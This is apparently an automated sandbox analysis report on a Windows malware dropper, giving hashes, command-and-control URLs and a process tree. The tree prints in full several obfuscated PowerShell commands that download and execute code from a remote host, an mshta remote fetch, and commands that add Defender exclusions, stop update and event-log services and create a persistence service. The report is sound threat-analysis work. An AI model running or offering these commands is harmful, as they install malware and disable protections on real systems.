Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 19:44
Static task
static1
Behavioral task
behavioral1
Sample
GRGFK_file.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
GRGFK_file.exe
Resource
win10v2004-20241007-en
General
-
Target
GRGFK_file.exe
-
Size
50KB
-
MD5
666248c216a3f63828f739839230f9f6
-
SHA1
13690837235053762a538b4c5b2b601ec9f6bb22
-
SHA256
00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da
-
SHA512
37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde
-
SSDEEP
768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exemshta.exepowershell.exeflow pid process 5 1792 powershell.exe 6 1728 powershell.exe 8 2600 mshta.exe 9 1632 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1728 powershell.exe 1792 powershell.exe 1632 powershell.exe 1724 powershell.exe 2820 powershell.exe 2568 powershell.exe -
Creates new service(s) 2 TTPs
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
services.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\LIB\ImagePath = "C:\\ProgramData\\Mig\\Mig.exe" services.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
LB31.exeMig.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe -
Executes dropped EXE 2 IoCs
Processes:
LB31.exeMig.exepid process 2448 LB31.exe 1996 Mig.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exeservices.exepid process 1632 powershell.exe 476 services.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 2280 powercfg.exe 1568 powercfg.exe 2092 powercfg.exe 2404 powercfg.exe 2516 powercfg.exe 1352 powercfg.exe 1652 powercfg.exe 2488 powercfg.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exeLB31.exepowershell.exeMig.exewmiprvse.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe Mig.exe File opened for modification C:\Windows\system32\wbem\Logs\wmiprov.log wmiprvse.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
LB31.exeMig.exedescription pid process target process PID 2448 set thread context of 1448 2448 LB31.exe dialer.exe PID 1996 set thread context of 1832 1996 Mig.exe dialer.exe PID 1996 set thread context of 1296 1996 Mig.exe dialer.exe PID 1996 set thread context of 1568 1996 Mig.exe powercfg.exe -
Drops file in Windows directory 3 IoCs
Processes:
wusa.exesvchost.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2916 sc.exe 1940 sc.exe 1972 sc.exe 1228 sc.exe 2276 sc.exe 2568 sc.exe 2600 sc.exe 2324 sc.exe 1252 sc.exe 2064 sc.exe 1608 sc.exe 1292 sc.exe 776 sc.exe 1872 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1160 ipconfig.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30dbe6d84d3cdb01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeLB31.exepowershell.exedialer.exeMig.exepowershell.exedialer.exepid process 1792 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1632 powershell.exe 2568 powershell.exe 1632 powershell.exe 1632 powershell.exe 2448 LB31.exe 1724 powershell.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 2448 LB31.exe 1448 dialer.exe 1448 dialer.exe 1448 dialer.exe 1448 dialer.exe 2448 LB31.exe 1448 dialer.exe 1448 dialer.exe 2448 LB31.exe 2448 LB31.exe 1448 dialer.exe 1448 dialer.exe 1448 dialer.exe 1448 dialer.exe 1996 Mig.exe 1448 dialer.exe 1448 dialer.exe 2820 powershell.exe 1448 dialer.exe 1448 dialer.exe 1448 dialer.exe 1448 dialer.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1996 Mig.exe 1832 dialer.exe 1832 dialer.exe 1832 dialer.exe 1832 dialer.exe 1832 dialer.exe 1832 dialer.exe 1832 dialer.exe 1832 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedialer.exepowercfg.exesvchost.exepowershell.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedialer.exedescription pid process Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeShutdownPrivilege 2404 powercfg.exe Token: SeShutdownPrivilege 2280 powercfg.exe Token: SeShutdownPrivilege 1568 powercfg.exe Token: SeDebugPrivilege 1448 dialer.exe Token: SeShutdownPrivilege 2092 powercfg.exe Token: SeAuditPrivilege 860 svchost.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 1832 dialer.exe Token: SeShutdownPrivilege 2488 powercfg.exe Token: SeShutdownPrivilege 1352 powercfg.exe Token: SeShutdownPrivilege 2516 powercfg.exe Token: SeShutdownPrivilege 1652 powercfg.exe Token: SeLockMemoryPrivilege 1568 dialer.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe Token: SeUndockPrivilege 860 svchost.exe Token: SeManageVolumePrivilege 860 svchost.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe Token: SeUndockPrivilege 860 svchost.exe Token: SeManageVolumePrivilege 860 svchost.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe Token: SeUndockPrivilege 860 svchost.exe Token: SeManageVolumePrivilege 860 svchost.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
GRGFK_file.exewscript.exepowershell.exeWScript.execmd.exepowershell.exemshta.exepowershell.execmd.exeLB31.exedialer.exedescription pid process target process PID 2500 wrote to memory of 2548 2500 GRGFK_file.exe wscript.exe PID 2500 wrote to memory of 2548 2500 GRGFK_file.exe wscript.exe PID 2500 wrote to memory of 2548 2500 GRGFK_file.exe wscript.exe PID 2548 wrote to memory of 1728 2548 wscript.exe powershell.exe PID 2548 wrote to memory of 1728 2548 wscript.exe powershell.exe PID 2548 wrote to memory of 1728 2548 wscript.exe powershell.exe PID 2548 wrote to memory of 1792 2548 wscript.exe powershell.exe PID 2548 wrote to memory of 1792 2548 wscript.exe powershell.exe PID 2548 wrote to memory of 1792 2548 wscript.exe powershell.exe PID 1728 wrote to memory of 2160 1728 powershell.exe WScript.exe PID 1728 wrote to memory of 2160 1728 powershell.exe WScript.exe PID 1728 wrote to memory of 2160 1728 powershell.exe WScript.exe PID 2160 wrote to memory of 2868 2160 WScript.exe cmd.exe PID 2160 wrote to memory of 2868 2160 WScript.exe cmd.exe PID 2160 wrote to memory of 2868 2160 WScript.exe cmd.exe PID 2868 wrote to memory of 2600 2868 cmd.exe mshta.exe PID 2868 wrote to memory of 2600 2868 cmd.exe mshta.exe PID 2868 wrote to memory of 2600 2868 cmd.exe mshta.exe PID 1792 wrote to memory of 1160 1792 powershell.exe ipconfig.exe PID 1792 wrote to memory of 1160 1792 powershell.exe ipconfig.exe PID 1792 wrote to memory of 1160 1792 powershell.exe ipconfig.exe PID 2600 wrote to memory of 1632 2600 mshta.exe powershell.exe PID 2600 wrote to memory of 1632 2600 mshta.exe powershell.exe PID 2600 wrote to memory of 1632 2600 mshta.exe powershell.exe PID 1632 wrote to memory of 2568 1632 powershell.exe powershell.exe PID 1632 wrote to memory of 2568 1632 powershell.exe powershell.exe PID 1632 wrote to memory of 2568 1632 powershell.exe powershell.exe PID 1632 wrote to memory of 2448 1632 powershell.exe LB31.exe PID 1632 wrote to memory of 2448 1632 powershell.exe LB31.exe PID 1632 wrote to memory of 2448 1632 powershell.exe LB31.exe PID 960 wrote to memory of 1704 960 cmd.exe wusa.exe PID 960 wrote to memory of 1704 960 cmd.exe wusa.exe PID 960 wrote to memory of 1704 960 cmd.exe wusa.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 2448 wrote to memory of 1448 2448 LB31.exe dialer.exe PID 1448 wrote to memory of 428 1448 dialer.exe winlogon.exe PID 1448 wrote to memory of 476 1448 dialer.exe services.exe PID 1448 wrote to memory of 484 1448 dialer.exe lsass.exe PID 1448 wrote to memory of 492 1448 dialer.exe lsm.exe PID 1448 wrote to memory of 596 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 676 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 760 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 820 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 860 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 976 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 268 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1056 1448 dialer.exe taskhost.exe PID 1448 wrote to memory of 1064 1448 dialer.exe spoolsv.exe PID 1448 wrote to memory of 1084 1448 dialer.exe Dwm.exe PID 1448 wrote to memory of 1132 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 1176 1448 dialer.exe Explorer.EXE PID 1448 wrote to memory of 752 1448 dialer.exe OSPPSVC.EXE PID 1448 wrote to memory of 1016 1448 dialer.exe wmiprvse.exe PID 1448 wrote to memory of 1760 1448 dialer.exe DllHost.exe PID 1448 wrote to memory of 2760 1448 dialer.exe svchost.exe PID 1448 wrote to memory of 2380 1448 dialer.exe sppsvc.exe PID 1448 wrote to memory of 2888 1448 dialer.exe wmiprvse.exe PID 1448 wrote to memory of 3024 1448 dialer.exe WMIADAP.EXE PID 1448 wrote to memory of 2448 1448 dialer.exe LB31.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Loads dropped DLL
PID:476 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵
- Drops file in System32 directory
PID:1016
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1760
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:2888
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
- Indicator Removal: Clear Windows Event Logs
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1084
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:3024
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:976
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:268
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1056
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1064
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1132
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:752
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2760
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2380
-
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1996 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2484
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:1964
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2568
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:1296
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\GRGFK_file.exe"C:\Users\Admin\AppData\Local\Temp\GRGFK_file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js3⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update6⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update7⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X8⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"9⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force10⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart10⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart11⤵
- Drops file in Windows directory
PID:1704
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc10⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:2916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv10⤵
- Launches sc.exe
PID:1608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits10⤵
- Launches sc.exe
PID:1252
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc10⤵
- Launches sc.exe
PID:776
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"10⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"10⤵
- Launches sc.exe
PID:2276
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog10⤵
- Launches sc.exe
PID:2064
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"10⤵
- Launches sc.exe
PID:1228
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns5⤵
- Gathers network information
PID:1160
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1093872636-98770726189291811-674463445662705599-1420527359-492369512-433891325"1⤵PID:2944
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1278316771069943630733583513499642870713752335-392429908-293599347-945817495"1⤵PID:2100
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1392297501-136729786-1574935317712526789-138423368014779102356959414941152457754"1⤵PID:3068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-107261553-727417454-20627100801296847340-259591075-511057529813253292880"1⤵PID:2388
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2041207293-654718478-19870179831194046535-8020476351865838050759730972-17626046"1⤵PID:2412
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "14415618672007507083-1947217072266699287-2078771830-5196751231227055814-1305977794"1⤵PID:324
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11653515044098221031936495319-165647501-785732439-223517622-174885394342713079"1⤵PID:1168
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "7381237821642329133-537978835150621927073942420761715383945237387658550117"1⤵PID:2812
-
